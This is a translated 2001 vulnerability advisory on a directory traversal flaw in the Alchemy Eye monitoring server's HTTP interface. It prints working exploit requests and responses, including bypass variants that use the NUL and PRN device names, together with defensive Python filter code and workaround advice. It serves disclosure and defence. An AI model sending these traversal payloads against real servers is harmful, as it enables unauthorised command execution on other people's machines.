Alchemy Eye Remote Arbitrary Command Execution Vulnerability

Release date: 2001-11-29
Update date: 2001-12-07

Affected systems:

Alchemy Lab Alchemy Eye 2.0
Alchemy Lab Alchemy Eye 2.1
Alchemy Lab Alchemy Eye 2.2
Alchemy Lab Alchemy Eye 2.3
Alchemy Lab Alchemy Eye 2.4
Alchemy Lab Alchemy Eye 2.5
Alchemy Lab Alchemy Eye 2.6
Alchemy Lab Alchemy Eye 3.0
   - Microsoft Windows 95
   - Microsoft Windows 98
   - Microsoft Windows 2000
   - Microsoft Windows 2000 SP1
   - Microsoft Windows 2000 SP2
   - Microsoft Windows NT 4.0
   - Microsoft Windows NT 4.0SP1
   - Microsoft Windows NT 4.0SP2
   - Microsoft Windows NT 4.0SP3
   - Microsoft Windows NT 4.0SP4
   - Microsoft Windows NT 4.0SP5
   - Microsoft Windows NT 4.0SP6
   - Microsoft Windows NT 4.0SP6a
Unaffected systems:

Alchemy Lab Alchemy Eye 1.7
Alchemy Lab Alchemy Eye 1.8
   - Microsoft Windows 95
   - Microsoft Windows 98
   - Microsoft Windows 2000
   - Microsoft Windows 2000 SP1
   - Microsoft Windows 2000 SP2
   - Microsoft Windows NT 4.0
   - Microsoft Windows NT 4.0SP1
   - Microsoft Windows NT 4.0SP2
   - Microsoft Windows NT 4.0SP3
   - Microsoft Windows NT 4.0SP4
   - Microsoft Windows NT 4.0SP5
   - Microsoft Windows NT 4.0SP6
   - Microsoft Windows NT 4.0SP6a
Description:

BUGTRAQ  ID: 3599
CVE(CAN) ID: CAN-2001-0871

   Alchemy Eye is a network monitoring application for the Windows platform, maintained by Alchemy Labs.

   Alchemy Eye has a built-in HTTP server used for monitoring and control. This HTTP server has a
directory traversal vulnerability that lets an attacker execute arbitrary commands on the host.

<* Source: Rapid 7 Security Advisories (advisory@rapid7.com)
   Link: http://archives.neohapsis.com/archives/bugtraq/2001-11/0287.html
         http://www.rapid7.com
*>

Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!


Rapid 7 Security Advisories provided the following demonstration of the vulnerability:

Versions 2.x up to 2.6 allow arbitrary command execution with a simple dot-dot directory traversal:

$ telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /cgi-bin/../../../../WINNT/system32/ipconfig.exe HTTP/1.0


HTTP/1.0 200 OK
Date: Thu, 29 Nov 2001 18:20:00 GMT
Server: Alchemy Eye/2.0.20
MIME-version: 1.0
Content-Type: text/html
Location: /cgi-bin/../../../../WINNT/system32/ipconfig.exe
Content-Length: 275



Windows 2000 IP Configuration


Ethernet adapter Cable:


    Connection-specific DNS Suffix . : foo.bar.com
    IP Address. . . . . . . . . . . . : 192.168.0.2
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
    Default Gateway . . . . . . . . . : 192.168.0.1

Versions after 2.6 can no longer be exploited with the simple dot-dot traversal:

$ telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /cgi-bin/../../../../WINNT/system32/ipconfig.exe HTTP/1.0


HTTP/1.0 403 Forbidden
Server: Alchemy Eye/2.6.16
MIME-version: 1.0
Content-Type: text/plain
Location: /cgi-bin/../../../../WINNT/system32/ipconfig.exe
Content-Length: 9


Forbidden

However, a different variant still works: prefix the dot-dot with the Windows "NUL" device name:

$ telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /cgi-bin/NUL/../../../../WINNT/system32/ipconfig.exe HTTP/1.0


HTTP/1.0 200 OK
Server: Alchemy Eye/2.6.16
MIME-version: 1.0
Content-Type: text/html
Location: /cgi-bin/NUL/../../../../WINNT/system32/ipconfig.exe
Content-Length: 275

Windows 2000 IP Configuration

Ethernet adapter Cable:

  Connection-specific DNS Suffix . : foo.bar.com
  IP Address. . . . . . . . . . . . : 192.168.0.2
  Subnet Mask . . . . . . . . . . . : 255.255.255.0
  Default Gateway . . . . . . . . . : 192.168.0.1

Version 2.7.x addressed the "NUL" device name problem but remains vulnerable when another device
name such as "PRN" is used instead of "NUL":

$ telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /cgi-bin/PRN/../../../../WINNT/system32/ipconfig.exe HTTP/1.0


HTTP/1.0 200 OK
Server: Alchemy Eye/3.0.10
MIME-version: 1.0
Content-Type: text/html
Location: /cgi-bin/PRN/../../../../WINNT/system32/ipconfig.exe
Content-Length: 275

Windows 2000 IP Configuration

Ethernet adapter Cable:

  Connection-specific DNS Suffix . : foo.bar.com
  IP Address. . . . . . . . . . . . : 192.168.0.2
  Subnet Mask . . . . . . . . . . . : 255.255.255.0
  Default Gateway . . . . . . . . . : 192.168.0.1

An attacker cannot execute commands with arguments, because the HTTP server does not handle spaces.
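As an added defender-side example (not code from the advisory or from Alchemy Lab), the following Python contrasts a filter of the kind the advisory describes with a hardened one: the hardened check resolves the requested path segment by segment, decodes percent-encoding, treats backslash as a separator, and rejects Windows device-name segments before comparing the result against the allowed root. The weak check is a hypothetical reconstruction, not Alchemy Eye's actual code; the sample targets are the request paths shown above.

```python
import re
from urllib.parse import unquote

# Windows reserved device names; "NUL.txt" still maps to NUL, so only the stem is compared.
RESERVED_DEVICE_NAMES = {"CON", "PRN", "AUX", "NUL"} | {
    f"{base}{n}" for base in ("COM", "LPT") for n in range(1, 10)
}

def is_reserved_device(segment: str) -> bool:
    """True if a path segment names a Windows device, with or without an extension."""
    stem = segment.split(".", 1)[0].rstrip(" ")
    return stem.upper() in RESERVED_DEVICE_NAMES

def weak_check(request_path: str) -> bool:
    """Hypothetical reconstruction of a 2.6-style filter: it refuses only a path that
    begins with the literal '/cgi-bin/../', so a device name before the dot-dot slips by."""
    return not request_path.startswith("/cgi-bin/../")

def hardened_check(request_path: str, root: str = "/cgi-bin") -> bool:
    """Canonicalise first, decide second: decode percent-encoding, treat backslash as a
    separator, resolve '.' and '..', refuse device names, and require the result to stay in root."""
    decoded = unquote(request_path)
    if "\x00" in decoded:
        return False
    resolved = []
    for segment in re.split(r"[\\/]+", decoded):
        if segment in ("", "."):
            continue
        if segment == "..":
            if not resolved:
                return False  # attempt to climb above the server root
            resolved.pop()
        elif is_reserved_device(segment):
            return False
        else:
            resolved.append(segment)
    canonical = "/" + "/".join(resolved)
    return canonical == root or canonical.startswith(root + "/")

# Constructed request targets: the three variants shown in the advisory plus a benign one.
SAMPLE_TARGETS = [
    "/cgi-bin/../../../../WINNT/system32/ipconfig.exe",
    "/cgi-bin/NUL/../../../../WINNT/system32/ipconfig.exe",
    "/cgi-bin/PRN/../../../../WINNT/system32/ipconfig.exe",
    "/cgi-bin/status",
]

def evaluate(targets=SAMPLE_TARGETS) -> dict:
    """Map each target to (allowed by the weak filter, allowed by the hardened filter)."""
    return {t: (weak_check(t), hardened_check(t)) for t in targets}
```

The weak filter lets both device-name variants through, while the hardened filter refuses every traversal attempt and still accepts the benign request.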


Recommendations:

Temporary workaround:

If you cannot install a patch or upgrade immediately, NSFOCUS recommends the following measures to reduce the threat:

   * Disable the HTTP interface in the options.

   * Restrict the IP range allowed to use the HTTP interface, or configure HTTP authentication, so that
     only trusted users can access the HTTP management interface.

Vendor patch:

The vendor has not yet released a patch or upgrade. Users of this software are advised to follow the
vendor's homepage for the latest version:
http://www.alchemy-lab.com/products/eye/


This advisory was translated and compiled by NSFOCUS. All rights reserved; reproduction without permission is prohibited.